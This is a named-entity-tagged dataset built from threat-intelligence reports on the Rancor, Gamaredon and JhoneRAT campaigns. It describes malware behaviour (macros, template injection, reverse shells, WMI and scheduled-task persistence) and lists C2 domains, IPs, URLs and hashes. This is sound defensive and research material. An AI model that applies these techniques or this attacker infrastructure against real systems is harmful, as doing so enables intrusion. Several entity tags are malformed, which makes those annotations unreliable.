O + +January B-TIME +2019 E-TIME +sent O +via O +149.28.156.61 S-IP +to O +deliver O +either O +Derusbi S-MAL +or O +KHRat S-MAL +samples O +with O +either O +cswksfwq.kfesv.xyz S-DOM +or O +connect.bafunpda.xyz S-DOM +as O +C2 S-TOOL +. O + +DUDELL S-MAL +: O +SHA256 S-ENCR +: O +0d61d9baab9927bb484f3e60384fdb6a3709ca74bc6175ab16b220a68f2b349e S-SHA2 +. O + +DUDELL S-MAL +: O +File O +Type O +:M B-TOOL +icrosoft I-TOOL +Excel I-TOOL +97 I-TOOL +– I-TOO B-IDTYL +2 E-IDTY003 I-TOOL +Document E-TOOL +. O + +DUDELL S-MAL +: O +File O +Name O +:E B-FILE +quipment I-FILE +Purchase I-FILE +List I-FILE +2018-2020 I-FILE +(Final I-FILE +).xls E-FILE +. O + +The O +DUDELL S-MAL +sample O +is O +a O +weaponized O +Microsoft B-TOOL +Excel B-IDTY I-TOOL E-IDTY +document E-TOOL +that O +contains O +a O +malicious B-TOOL +macro E-TOOL S-TOOL +that O +runs O +on O +the O +victim O +’s O +machine O +. O + +It O +shares O +the O +same O +malicious O +behavior O +reported O +by O +Checkpoint S-IDTY +in O +Rancor S-APT +: O +The B-MAL +Year I-MAL +of I-MAL +The I-MAL +Phish E-MAL S-ACT +SHA-1 S-ENCR +c829f5f9ff89210c888c1559bb085ec6e65232de S-SHA1 +. O + +In O +Check B-IDTY +Point E-IDTY +’s O +blog O +, O +the O +sample O +is O +from O +December B-TIME +2018 E-TIME +while O +this O +sample O +is O +from O +April B-TIME +2018 E-TIME +. O + +The O +macro S-TOOL +in O +this O +document O +gets O +executed O +when O +the O +user O +views O +the O +document O +and O +clicks O +Enable O +Content O +, O +at O +which O +point O +the O +macro S-TOOL +locates O +and O +executes O +the O +data O +located O +under O +the O +Company O +field O +in O +the O +document O +’s O +properties O +. O + +The O +C2 S-TOOL +server O +199.247.6.253 S-IP +is O +known O +to O +be O +used O +by O +the O +Rancor S-APT +group O +. O + +The O +script O +is O +downloading O +a O +second O +stage O +payload O +via O +the O +Microsoft S-IDTY +tool O +msiexec S-TOOL +. 
O + +Unfortunately O +at O +the O +time O +of O +discovery O +, O +the O +hosted O +file O +is O +unavailable O +. O + +Our O +systems O +were O +able O +to O +record O +the O +hash O +of O +file O +tmp.vbs S-FILE +, O +but O +the O +contents O +of O +the O +file O +are O +no O +longer O +available O +. O + +Pivoting O +off O +the O +filename O +and O +directory O +, O +we O +discovered O +a O +similar O +VBS O +script O +used O +by O +the O +Rancor S-APT +actors O +that O +might O +give O +us O +some O +clues O +on O +what O +the O +contents O +of O +tmp.vbs S-FILE +would O +resemble O +. O + +File O +office.vbs S-FILE +( O +SHA256 S-ENCR +: O +4b0b319b58c2c0980390e24379a2e2a0a1e1a91d17a9d3e26be6f4a39a7afad2 S-SHA2 +) O +was O +discovered O +in O +directory O +c:\Windows\System32\spool\drivers\color O +. O + +Hashes O +for O +tmp.vbs S-FILE +:b B-SHA2 +958e481c90939962081b9fb85451a2fb28f705d5b5060f5d9d5aebfb390f8 E-SHA2 +. O + +If O +the O +file O +tmp.vbs S-FILE +does O +in O +fact O +contain O +similar O +content O +as O +that O +of O +office.vbs S-FILE +, O +then O +it O +could O +be O +another O +method O +for O +downloading O +payloads O +onto O +the O +target O +. O + +DDKONG S-MAL +Plugin O +: O +SHA256 S-ENCR +: O +0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707 S-SHA2 +. O + +DDKONG S-MAL +Plugin O +: O +Compile O +Date O +and O +Time O +: O +2017-02-17 B-TIME +08:33:45 I-TIME +AM E-TIME +. O + +DDKONG S-MAL +Plugin O +: O +File O +Type O +: O +PE32 O +executable O +( O +DLL S-TOOL +) O +Intel O +80386, O +for O +MS B-OS +Windows E-OS +. O + +DDKONG S-MAL +Plugin O +: O +File O +Name O +: O +H B-FILE +istory.nls E-FILE +. O + +The O +DllInstall S-MAL +export O +function O +is O +responsible O +for O +the O +core O +behavior O +of O +the O +malware O +, O +as O +just O +loading O +it O +does O +nothing O +. 
O + +Once O +this O +export O +is O +called O +, O +it O +checks O +for O +a O +hidden O +window O +with O +a O +caption O +of O +Hello O +Google O +! O + +. O + +This O +check O +is O +performed O +to O +ensure O +that O +only O +one O +instance O +of O +the O +malware O +is O +running O +at O +a O +time O +. O + +The O +hidden O +window O +created O +by O +the O +malware O +filters O +on O +any O +user O +input O +( O +e.g O +. O +keyboard O +or O +mouse O +activity O +) O +. O + +This O +could O +be O +an O +attempt O +to O +evade O +sandbox O +analysis O +as O +mouse O +and O +keyboard O +movement O +is O +typically O +not O +performed O +. O + +The O +malware O +then O +proceeds O +to O +beacon O +to O +a O +configured O +remote O +server O +of O +cswksfwq.kfesv.xyz S-DOM +on O +TCP S-PROT +port O +8080 O +. O + +Upon O +successful O +connection O +, O +the O +malware O +transmits O +victim O +information O +such O +as O +: O +hostname O +, O +IP O +address O +, O +Language O +Pack O +along O +with O +other O +operating O +system O +information O +. O + +The O +data O +transmitted O +are O +XOR S-ENCR +encoded O +. O + +The O +malware O +supports O +the O +following O +capabilities O +: O +Terminate O +specific O +process、Enumerate O +processes、Upload O +file、Download O +file、Delete O +file、List O +folder O +contents、Enumerate O +storage O +volumes、Execute O +a O +command、Reverse O +shell、Take O +a O +screenshot O +. O + +KHRAT S-MAL +: O +SHA256 S-ENCR +: O +aaebf987b8d80d71313c3c0f2c16d60874ffecbdda3bb6b44d6cba6d380 S-SHA2 +. O + +KHRAT S-MAL +: O +Compile O +Date O +and O +Time O +: O +2018-05-02 B-TIME +05:22:23 I-TIME +PM E-TIME +. O + +KHRAT S-MAL +: O +File O +Type O +: O +PE32 O +executable O +( O +DLL S-TOOL +) O +Intel O +80386, O +for O +MS B-OS +Windows E-OS +. O + +KHRAT S-MAL +: O +File O +Name O +: O +8081.dll S-FILE +. 
O + +Rmcmd O +: O + +When O +the O +DLL S-TOOL +is O +initially O +loaded O +, O +it O +dynamically O +resolves O +and O +imports O +additional O +modules O +( O +DLLs S-TOOL +’ O +) O +needed O +. O + +Once O +loaded O +and O +the O +export O +entry O +of O +Rmcmd O +is O +called O +, O +it O +creates O +a O +Windows B-TOOL S-OS I-TOOL +mutex E-TOOL +named O +gkdflbmdfk S-TOOL +. O + +This O +ensures O +that O +only O +one O +copy O +of O +the O +malware O +is O +running O +at O +a O +time O +. O + +It O +then O +begins O +to O +beacon O +to O +a O +configured O +domain O +of O +connect.bafunpda.xyz S-DOM +on O +TCP S-PROT +port O +8081 O +. O + +The O +malware O +collects O +and O +transmits O +data O +from O +the O +host O +, O +such O +as O +hostname O +and O +is O +XOR S-ENCR +encoded O +with O +the O +first O +byte O +of O +the O +network O +traffic O +being O +the O +key O +. O + +Reverse B-TOOL +Shell E-TOOL +: O + +The O +malware O +behavior O +and O +code O +share O +similarities O +with O +an O +older O +KHRAT S-MAL +sample O +from O +May B-TIME +2018 E-TIME +. O + +Sample O +( O +SHA256 S-ENCR +: O +bc1c3e754be9f2175b718aba62174a550cdc3d98ab9c36671a58073140381659 S-SHA2 +) O +has O +the O +same O +export O +entry O +name O +and O +is O +also O +a O +reverse B-TOOL +shell E-TOOL +. O + +The O +newer O +sample O +appears O +to O +be O +a O +re-write O +for O +optimization O +purposes O +with O +the O +underlying O +behavior O +remaining O +the O +same O +, O +reverse B-TOOL +shell E-TOOL +. O + +Derusbi S-MAL +: O +SHA256 S-ENCR +: O +83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2ab S-SHA2 +. O + +Derusbi S-MAL +: O +Compile O +Date O +and O +Time O +: O +2012-09-14 B-TIME +09:20:12 I-TIME +AM E-TIME +. O + +Derusbi S-MAL +: O +File O +Type O +:P O +E32 O +executable O +( O +DLL S-TOOL +) O +Intel O +80386, O +for O +MS B-OS +Windows E-OS +. O + +Derusbi S-MAL +: O +File O +Name O +: O +32.dll S-FILE +. 
O + +Derusbi S-MAL +is O +a O +backdoor B-MAL S-MAL I-MAL +Trojan E-MAL S-MAL +believed O +to O +be O +used O +among O +a O +small O +group O +of O +attackers O +, O +which O +includes O +the O +Rancor S-APT +group O +. O + +This O +particular O +sample O +is O +a O +loader O +that O +loads O +an O +encrypted O +payload O +for O +its O +functionality O +. O + +This O +DLL S-TOOL +requires O +the O +loading O +executable O +to O +include O +a O +32-byte O +key O +on O +the O +command O +line O +to O +be O +able O +to O +decrypt O +the O +embedded O +payload O +, O +which O +unfortunately O +we O +do O +not O +have O +. O + +Even O +though O +we O +don’t O +have O +the O +decryption O +key O +or O +loader O +, O +we O +have O +uncovered O +some O +interesting O +artifacts O +. O + +If O +the O +module O +that O +loads O +the O +sample O +is O +named O +myapp.exe S-FILE +the O +module O +will O +exit O +Once O +loaded O +, O +it O +sleeps O +for O +six O +seconds O +. O + +Looks O +for O +a O +Windows S-OS +pipe O +named O +\\.\pipe\_kernel32.dll.ntdll.dll.user32.dll S-FILE +. O + +Looks O +for O +a O +Windows S-OS +device O +named O +\Device\acpi_010221 O +. O +n O +July B-TIME +2019 E-TIME +, O +we O +discovered O +an O +interesting O +VBScript S-TOOL +named O +Chrome.vbs S-FILE +( O +SHA256 S-ENCR +: O +0C3D4DFA566F3064A8A408D3E1097C454662860BCACFB6675D2B72739CE449C2 S-SHA2 +) O +associated O +with O +the O +Rancor S-APT +group O +. O + +This O +particular O +VBScript S-TOOL +payload O +beacons O +to O +domain O +bafunpda.xyz S-DOM +, O +which O +is O +also O +used O +by O +the O +KHRAT S-MAL B-MAL +Trojan E-MAL S-MAL +listed O +above O +in O +Table O +2 O +. O + +This O +VBScript S-TOOL +is O +obfuscated O +and O +contains O +packed O +data O +that O +is O +used O +to O +infect O +a O +target O +with O +multiple O +chained O +persistent O +artifacts O +. 
O + +The O +MOF B-TOOL +file E-TOOL +created O +by O +the O +VBScript S-TOOL +is O +used O +as O +a O +persistence O +mechanism O +via O +Windows B-TOOL S-OS I-TOOL +Management I-TOOL +Instrumentation E-TOOL +( O +WMI S-TOOL +) O +Event O +Subscriptions O +. O + +MOF B-TOOL +files E-TOOL +are O +compiled O +scripts O +that O +describe O +Common B-TOOL +Information I-TOOL +Model E-TOOL +( O +CIM S-TOOL +) O +classes O +, O +which O +are O +compiled O +into O +the O +WMI S-TOOL +repository O +. O + +The O +technique O +is O +described O +by O +MITRE S-SECTEAM B-TOOL +ATT&CK I-TOOL +IDT1084 E-TOOL +. O + +This O +particular O +MOF B-TOOL +file E-TOOL +creates O +a O +timer O +event O +that O +is O +triggered O +every O +five O +seconds O +. O + +The O +DLL S-TOOL +located O +in O +the O +Media B-TOOL +registry E-TOOL +key O +is O +a O +variant O +of O +the O +KHRAT B-MAL +Troja S-MALn E-MAL S-MAL +. O + +It O +beacons O +to O +domain O +connect.bafunpda.xyz S-DOM +and O +attempts O +to O +connect O +to O +TCP S-PROT +port O +4433 O +. O + +This O +is O +the O +same O +domain O +used O +by O +the O +KHRAT S-MAL B-MAL +Trojan E-MAL S-MAL +. O + +Rancor S-APT +, O +a O +cyber O +espionage O +group O +active O +since O +at B-TIME +least I-TIME +2017 E-TIME +, O +continues O +to O +conduct O +targeted O +attacks O +in O +Southeast B-LOC +Asia E-LOC S-LOC +and O +has O +been O +found O +using O +an O +undocumented O +, O +custom O +malware O +family O +– O +which O +we O +’ve O +dubbed O +Dudell S-MAL +– O +to O +download O +a O +second O +stage O +payload O +once O +its O +malicious O +macro O +is O +executed O +. O + +Additionally O +, O +Rancor S-APT +is O +also O +using O +the O +Derusbi S-MAL +malware O +family O +to O +load O +a O +secondary O +payload O +once O +it O +infiltrates O +a O +target O +. O + +Rancor S-APT +: O +0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707 S-SHA2 +. 
O + +Rancor S-APT +: O +AAEBF987B8D80D71313C3C0F2C16D60874FFECBDDA3BB6B44D6CBA6D38031609 S-SHA2 +. O + +Rancor S-APT +: O +0D61D9BAAB9927BB484F3E60384FDB6A3709CA74BC6175AB16B220A68F2B349E S-SHA2 +. O + +Rancor S-APT +: O +DB982B256843D8B6429AF24F766636BB0BF781B471922902D8DCF08D0C58511E S-SHA2 +. O + +Rancor S-APT +: O +CC081FFEA6F4769733AF9D0BAE0308CA0AE63667FA225E7965DF0884E96E2D2A S-SHA2 +. O + +Rancor S-APT +: O +BC1C3E754BE9F2175B718ABA62174A550CDC3D98AB9C36671A58073140381659 S-SHA2 +. O + +Rancor S-APT +: O +83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2abd9e0d S-SHA2 +. O + +Rancor S-APT +: O +cswksfwq.kfesv.xyz S-DOM +. O + +Rancor S-APT +: O +Connect.bafunpda.xyz S-DOM +. O + +Rancor S-APT +: O +199.247.6.253 S-IP +. O + + +Cyberwarfare O +: O +A O +deep O +dive O +into O +the O +latest O +Gamaredon S-APT +Espionage O +Campaign O +. O + +Gamaredon S-APT +Group O +is O +a O +Cyber O +Espionage O +persistent O +operation O +attributed O +to O +Russians B-IDTY +FSB E-IDTY +( O +Federal B-IDTY +Security I-IDTY +Service E-IDTY +) O +in O +a O +long-term O +military O +and O +geo-political O +confrontation O +against O +the O +Ukrainian B-IDTY +government E-IDTY +and O +more O +in O +general O +against O +the O +Ukrainian O +military O +power O +. O + +Gamaredon S-APT +has O +been O +active O +since O +2014 S-TIME +, O +and O +during O +this O +time O +, O +the O +modus O +operandi O +has O +remained O +almost O +the O +same O +. O + +The O +most O +used O +malware O +implant O +is O +dubbed O +Pteranodon S-MAL +or O +Pterodo S-MAL +and O +consists O +of O +a O +multistage O +backdoor S-MAL +designed O +to O +collect O +sensitive O +information O +or O +maintaining O +access O +on O +compromised O +machines O +. O + +It O +is O +distributed O +in O +a O +spear B-ACT +phishing I-ACT +campaign E-ACT +with O +a O +weaponized O +office S-TOOL +document O +that O +appears O +to O +be O +designed O +to O +lure O +military O +personnel O +. 
O + +In O +the O +recent O +months O +, O +Ukrainian B-SECTEAM +CERT E-SECTEAM +( O +CERT-UA S-SECTEAM +) O +reported O +an O +intensification O +of O +Gamaredon B-ACT S-APT I-ACT +Cyberattacks E-ACT +against O +military O +targets O +. O + +The O +new O +wave O +dates O +back O +to O +the O +end O +of O +November B-TIME +2019 E-TIME +and O +was O +first O +analyzed O +by O +Vitali O +Kremez O +. O + +Starting O +from O +those O +findings O +, O +Cybaze-Yoroi B-SECTEAM +ZLab I-SECTEAM +team E-SECTEAM +decided O +to O +deep O +dive O +into O +a O +technical O +analysis O +of O +the O +latest O +Pterodo S-MAL +implant O +. O + +The O +complex O +infection O +chain O +begins O +with O +a O +weaponized O +Office S-TOOL +document O +named O +“ O +f.doc S-FILE +” O +. O + +Hash O +: O +76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a S-SHA2 + +Threat O +: O +Gamaredon S-APT +Pteranodon S-MAL +weaponized O +document O +. O + +Brief O +Description O +: O +Doc O +file O +weaponized O +with O +Exploit O +. O + +Ssdeep S-TOOL +: O +768:u0foGtYZKQ5QZJQ6hKVsEEIHNDxpy3TI3dU4DKfLX9Eir O +: O +uG1aKQ5OwCrItq3TgGfLt9r O +. O + +The O +decoy O +document O +is O +written O +using O +the O +ukrainian O +language O +mixed O +to O +many O +special O +chars O +aimed O +to O +lure O +the O +target O +to O +click O +on O +it O +. O + +The O +document O +leverages O +the O +common O +exploit O +aka O +template O +injection O +and O +tries O +to O +download O +a O +second O +stage O +from O +“ O +http://win-apu.ddns.net/apu.dot S-IP +” O +. O + +Thanks O +to O +this  O +exploit O +( O +Remote B-VULNAME +Code I-VULNAME +Execution E-VULNAME +exploit O +) O +the O +user O +interaction O +is O +not O +required O +, O +in O +fact O +the O +“ O +enable O +macro S-TOOL +” O +button O +is O +not O +shown O +. 
O + +The O +downloaded O +document O +has O +a O +“ O +.dot S-FILE +” O +extension O +, O +used O +by O +Microsoft B-TOOL +Office E-TOOL +to O +save O +templates O +for O +different O +documents O +with O +similar O +formats O +. O + +Basic O +Information O +on O +the O +“ O +.dot S-FILE +” O +file O +are O +provided O +: O + +Hash O +: O +e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8 S-SHA2 +. O + +Threat O +: O +Gamaredon S-APT +Pteranodon S-MAL +loader O +dot O +file O +. O + +Brief O +Description O +: O +Dot O +file O +enabling O +the O +infection O +of O +the O +Gamaredon S-APT +Pteranodon S-MAL +. O + +Ssdeep S-TOOL +: O +768:5KCB8tnh7oferuHpC0xw+hnF4J7EyKfJ O +: O +oI8XoWruHpp/P4 O +. O + +If O +we O +decide O +to O +open O +the O +document O +, O +we O +see O +that O +the O +document O +is O +empty O +, O +but O +it O +requires O +the O +enabling O +of O +the O +macro S-TOOL +. O + +The O +body O +of O +the O +macro S-TOOL +can O +be O +logically O +divided O +into O +two O +distinct O +parts O +: O + +The O +first O +one O +is O +the O +setting O +of O +the O +registry O +key O +“ O +HKEY_CURRENT_USER\Software\Microsoft\Office\ O +” O +& O +Application.Version O +& O +_ O +” O +\Word\Security\ O +” O +and O +the O +declaration O +of O +some O +other O +variables O +, O +such O +as O +the O +dropurl O +“ O +geticons.ddns.net O +” O +. O + +The O +second O +one O +is O +the O +setting O +of O +the O +persistence O +mechanism O +through O +the O +writing O +of O +the O +vbs O +code O +in O +the O +Startup O +folder O +with O +name O +“ O +templates.vbs S-FILE +” O +. O + +This O +vbs O +is O +properly O +the O +macro O +executed O +by O +the O +macro O +engine O +of O +word O +. O + +Analyzing O +the O +content O +of O +“ O +templates.vbs S-FILE +” O +it O +is O +possible O +to O +notice O +that O +it O +define O +a O +variable O +containing O +a O +URL O +like O +“ O +http://geticons.ddns.net/ADMIN-PC_E42CAF54//autoindex B-URL +. 
E-URL +]php O +” O +obtained O +from O +“ O +hxp://get-icons.ddns B-URL +. I-URL +]net/ I-URL +” I-URL +& I-URL +NlnQCJG I-URL +& I-URL +“ I-URL +_ I-URL +” I-URL +& I-URL +uRDEJCn I-URL +& I-URL +“ I-URL +//autoindex I-URL +. I-URL +]php E-URL +” O +, O +where O +“ O +NlnQCJG O +” O +is O +the O +name O +that O +identifies O +the O +computer O +on O +the O +network O +and O +“ O +uRDEJCn O +” O +is O +the O +serial O +number O +of O +drive O +in O +hexadecimal O +encoding O +. O + +From O +this O +URL O +it O +tries O +to O +download O +another O +stage O +then O +storing O +it O +into O +“ O +C:\Users\admin\AppData\Roaming\ O +” O +path O +with O +random O +name O +. O + +At O +the O +end O +, O +“ O +templates.vbs S-FILE +” O +script O +will O +force O +the O +machine O +to O +reboot O +. O + +The O +dropped O +sample O +is O +an O +SFX B-TOOL +archive E-TOOL +, O +like O +the O +tradition O +of O +Gamaredon S-APT +implants O +. O + +Hash O +: O +c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f S-SHA2 +. O + +Threat O +: O +Gamaredon S-APT +Pteranodon S-MAL +implant O +SFX B-TOOL +archive E-TOOL +. O + +Brief O +Description O +: O +SFX O +Archive O +First O +Stage O +. O + +Ssdeep S-TOOL +: O +24576:zXwOrRsTQlIIIIwIEuCRqKlF8kmh/ZGg4kAL/WUKN7UMOtcv O +: O +zgwR/lIIIIwI6RqoukmhxGgZ+WUKZUMv O +. O + +By O +simply O +opening O +the O +SFX B-TOOL +archive E-TOOL +, O +it O +is O +possible O +to O +notice O +two O +different O +files O +that O +are O +shown O +below O +and O +named O +respectively O +“ O +8957.cmd S-FILE +” O +and O +“ O +28847 S-FILE +” O +. O + +When O +executed O +, O +the O +SFX B-TOOL +archive E-TOOL +will O +be O +extracted O +and O +the O +“ O +8957.cmd S-FILE +” O +will O +be O +run O +. 
O + +At O +this O +point O +, O +the O +batch O +script O +renames O +the O +“ O +28847 S-FILE +” O +file O +in O +“ O +28847.exe S-FILE +” O +, O +opens O +it O +using O +“ O +pfljk O +,fkbcerbgblfhs O +” O +as O +password O +and O +the O +file O +contained O +inside O +the O +“ O +28847.exe S-FILE +” O +file O +will O +be O +renamed O +in O +“ O +WuaucltIC.exe S-FILE +” O +. O + +Finally O +, O +it O +will O +be O +run O +using O +“ O +post.php S-FILE +” O +as O +argument O +. O + +The O +fact O +that O +the O +“ O +28847.exe S-FILE +” O +file O +can O +be O +opened O +makes O +us O +understand O +that  O +the O +“ O +28847 S-FILE +” O +file O +is O +another O +SFX S-TOOL +file O +. O + +Some O +static O +information O +about O +SFX S-TOOL +are O +: O + +Hash O +: O +3dfadf9f23b4c5d17a0c5f5e89715d239c832dbe78551da67815e41e2000fdf1 S-SHA2 +. O + +Threat O +: O +Gamaredon S-APT +Pteranodon S-MAL +implant O +SFX B-TOOL +archive E-TOOL +. O + +Brief O +Description O +: O +SFX B-TOOL +Archive E-TOOL +Second O +Stage O +. O + +Ssdeep S-TOOL +: O +24576:vmoO8itbaZiW+qJnmCcpv5lKbbJAiUqKXM O +: O +OoZwxVvfoaPu O +. O + +Exploring O +it O +, O +it O +is O +possible O +to O +see O +several O +files O +inside O +of O +it O +,  O +as O +well O +as O +the O +6323 S-FILE +file O +. O + +In O +this O +case O +, O +the O +SFX B-FILE +archive E-FILE +contains O +8 O +files O +: O +���ve O +of O +them O +are O +legit O +DLLs S-TOOL +used O +by O +the O +“ O +6323 S-FILE +” O +executable O +to O +interoperate O +with O +the O +OLE S-TOOL +format O +defined O +and O +used O +by O +Microsoft B-TOOL +Office E-TOOL +. O + +The O +“ O +ExcelMyMacros.txt S-FILE +” O +and O +“ O +wordMacros.txt S-FILE +” O +files O +contain O +further O +macro O +script O +, O +described O +next O +. 
O + +So O +, O +static O +analysis O +on O +the O +“ O +6323 S-FILE +” O +file O +shown O +as O +its O +nature O +: O +it O +is O +written O +using O +Microsoft B-TOOL +Visual I-TOOL +Studio I-TOOL +.NET E-TOOL +, O +therefore O +easily O +to O +reverse O +. O + +Before O +reversing O +the O +executable O +, O +it O +is O +possible O +to O +clean O +it O +allowing O +the O +size O +reduction O +and O +the O +junk O +instruction O +reduction O +inside O +the O +code O +. O + +The O +below O +image O +shows O +the O +information O +about O +the O +sample O +before O +and O +after O +the O +cleaning O +. O + +The O +first O +check O +performed O +is O +on O +the O +arguments O +: O +if O +the O +arguments O +length O +is O +equal O +to O +zero O +, O +the O +malware O +terminates O +the O +execution O +. O + +After O +that O +, O +the O +malware O +checks O +if O +the O +existence O +of O +the O +files O +“ O +ExcelMyMacros.txt S-FILE +” O +and O +“ O +wordMacros.txt S-FILE +” O +in O +the O +same O +path O +where O +it O +is O +executed O +: O +if O +true O +then O +it O +reads O +their O +contents O +otherwise O +it O +will O +exit O +. O + +As O +visible O +in O +the O +previous O +figure O +, O +the O +only O +difference O +between O +the O +files O +are O +in O +the O +variable O +, O +registry O +key O +and O +path O +used O +by O +Word O +rather O +than O +by O +Excel S-TOOL +. O + +Finally O +the O +macros S-TOOL +are O +executed O +using O +the O +Office S-TOOL +engine O +. O + +So O +let O +’s O +start O +to O +dissect O +the O +macros S-TOOL +. O + +For O +a O +better O +comprehension O +we O +will O +be O +considering O +only O +one O +macro S-TOOL +and O +in O +the O +specific O +case O +we O +will O +analyze O +“ O +wordMacros.txt S-FILE +” O +  O +ones O +. 
O + +First O +of O +all O +the O +macro S-TOOL +will O +set O +the O +registry O +key O +“ O +HKEY_CURRENT_USER\Software\Microsoft\Office\ O +” O +& O +Application.Version O +& O +_ O +” O +\Word\Security\ O +” O +and O +then O +will O +set O +up O +two O +scheduled O +tasks O +that O +will O +start O +respectively O +every O +12 O +and O +15 O +minutes O +: O +the O +first O +one O +will O +run O +a O +“ O +IndexOffice.vbs S-FILE +” O +in O +the O +path O +“ O +%APPDATA%\Microsoft\Office\ O +” O +and O +the O +second O +one O +will O +run O +“ O +IndexOffice.exe S-FILE +” O +in O +the O +same O +path O +. O + +Finally O +, O +the O +malware O +will O +write O +the O +“ O +IndexOffice.txt S-FILE +” O +file O +in O +the  O +“ O +%APPDATA%\Microsoft\Office\ O +” O +path O +. O + +The O +script O +will O +check O +the O +presence O +of O +the  O +“ O +IndexOffice.exe S-FILE +” O +artifact O +: O +if O +true O +then O +it O +will O +delete O +it O +and O +it O +will O +download O +a O +new O +file/script O +from O +“ O +http://masseffect.space/_/post.php S-URL +” O +. O + +The O +malware O +tries O +to O +save O +the O +C2 S-TOOL +response O +and O +encoding O +it O +using O +Encode O +function O +. O + +This O +function O +accepts O +three O +parameters O +: O +the O +input O +file O +, O +the O +output O +file O +and O +the O +arrKey O +; O +arrKey O +is O +calculated O +thanks O +to  O +GetKey O +function O +that O +accepts O +as O +input O +the O +Hexadecimal O +value O +of O +the O +Driver B-TOOL +SN E-TOOL +installed O +on O +the O +machine O +and O +returns O +the O +key O +as O +results O +. O + +Gamaredon S-APT +cyberwarfare O +operations O +against O +Ukraine S-LOC +are O +still O +active O +. O + +This O +technical O +analysis O +reveals O +that O +the O +modus O +operandi O +of O +the O +Group O +has O +remained O +almost O +identical O +over O +the O +years O +. 
O + +The O +massive O +use O +of O +weaponized O +Office S-TOOL +documents O +, O +Office S-TOOL B-ACT +template I-ACT +injection E-ACT +, O +sfx B-TOOL +archives E-TOOL +, O +wmi S-TOOL +and O +some O +VBA B-TOOL +macro I-TOOL +stages S-TOOL E-TOOL +that O +dinamically O +changes O +,  O +make O +the O +Pterodon S-MAL +attack O +chain O +very O +malleable O +and O +adaptive O +. O + +However O +, O +the O +introduction O +of O +a O +.Net S-TOOL +component O +is O +a O +novelty O +compared O +to O +previous O +Pterodon S-MAL +samples O +. O + +Gamaredon S-APT +: O +76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a S-SHA2 +. O + +Gamaredon S-APT +: O +e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8 S-SHA2 +. O + +Gamaredon S-APT +: O +def13f94cdf793df3e9b42b168550a09ee906f07f61a3f5c9d25ceca44e8068c S-SHA2 +. O + +Gamaredon S-APT +: O +c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f S-SHA2 +. O + +Gamaredon S-APT +: O +86977a785f361d4f26eb3e189293c0e30871de3c93b19653c26a31dd4ed068cc S-SHA2 +. O + +Gamaredon S-APT +: O +http://win-apu.ddns.net/apu.dot/ S-URL +. O + +Gamaredon S-APT +: O +http://get-icons.ddns.net/apu.dot/ S-URL +. O + +Gamaredon S-APT +: O +http://masseffect.space/ S-URL +. O + + +JhoneRAT S-MAL +: O +Cloud O +based O +python S-TOOL +RAT S-TOOL +targeting O +Middle B-LOC +Eastern I-LOC +countries E-LOC +. O + +Today O +, O +Cisco B-SECTEAM +Talos E-SECTEAM +is O +unveiling O +the O +details O +of O +a O +new O +RAT S-TOOL +we O +have O +identified O +we O +'re O +calling O +" O +JhoneRAT S-MAL +" O +. O + +This O +new O +RAT S-TOOL +is O +dropped O +to O +the O +victims O +via O +malicious O +Microsoft B-TOOL +Office B-IDTY I-TOOL E-IDTY +docume S-TOOLnts E-TOOL +. 
O + +The O +dropper O +, O +along O +with O +the O +Python B-TOOL +RAT E-TOOL S-TOOL +, O +attempts O +to O +gather O +information O +on O +the O +victim O +'s O +machine O +and O +then O +uses O +multiple O +cloud O +services O +: O +Google B-TOOL +Drive E-TOOL +, O +Twitter S-TOOL +, O +ImgBB S-TOOL +and O +Google B-TOOL +Forms E-TOOL +. O + +The O +RAT S-TOOL +attempts O +to O +download O +additional O +payloads O +and O +upload O +the O +information O +gathered O +during O +the O +reconnaissance O +phase O +. O + +This O +particular O +RAT S-TOOL +attempts O +to O +target O +a O +very O +specific O +set O +of O +Arabic-speaking O +countries O +. O + +The O +filtering O +is O +performed O +by O +checking O +the O +keyboard O +layout O +of O +the O +infected O +systems O +. O + +Based O +on O +the O +analysed O +sample O +, O +JhoneRAT S-MAL +targets O +Saudi B-LOC +Arabia E-LOC +, O +Iraq S-LOC +, O +Egypt S-LOC +, O +Libya S-LOC +, O +Algeria S-LOC +, O +Morocco S-LOC +, O +Tunisia S-LOC +, O +Oman S-LOC +, O +Yemen S-LOC +, O +Syria S-LOC +, O +UAE S-LOC +, O +Kuwait S-LOC +, O +Bahrain S-LOC +and O +Lebanon S-LOC +. O + +The O +campaign O +shows O +an O +actor O +that O +developed O +a O +homemade O +RAT O +that O +works O +in O +multiple O +layers O +hosted O +on O +cloud O +providers O +. O + +JhoneRAT S-MAL +is O +developed O +in O +python S-TOOL +but O +not O +based O +on O +public O +source O +code O +, O +as O +it O +is O +often O +the O +case O +for O +this O +type O +of O +malware O +. O + +The O +attackers O +put O +great O +effort O +to O +carefully O +select O +the O +targets O +located O +in O +specific O +countries O +based O +on O +the O +victim O +'s O +keyboard O +layout O +. O + +Everything O +starts O +with O +a O +malicious O +document O +using O +a O +well-known O +vulnerability O +to O +download O +a O +malicious O +document O +hosted O +on O +the O +internet O +. 
O + +For O +this O +campaign O +, O +the O +attacker O +chose O +to O +use O +a O +cloud O +provider O +( O +Google S-TOOL +) O +with O +a O +good O +reputation O +to O +avoid O +URL O +blacklisting O +. O + +The O +malware O +is O +divided O +into O +a O +couple O +of O +layers O +— O +each O +layer O +downloads O +a O +new O +payload O +on O +a O +cloud O +provider O +to O +get O +the O +final O +RAT S-TOOL +developed O +in O +python S-TOOL +and O +that O +uses O +additional O +providers O +such O +as O +Twitter S-TOOL +and O +ImgBB S-TOOL +. O + +This O +RAT S-TOOL +is O +a O +good O +example O +of O +how O +a O +highly O +focused O +attack O +that O +tries O +to O +blend O +its O +network O +traffic O +into O +the O +crowd O +can O +be O +highly O +effective O +. O + +In O +this O +campaign O +, O +focusing O +detection O +of O +the O +network O +is O +not O +the O +best O +approach O +. O + +Instead O +, O +the O +detection O +must O +be O +based O +on O +the O +behaviour O +on O +the O 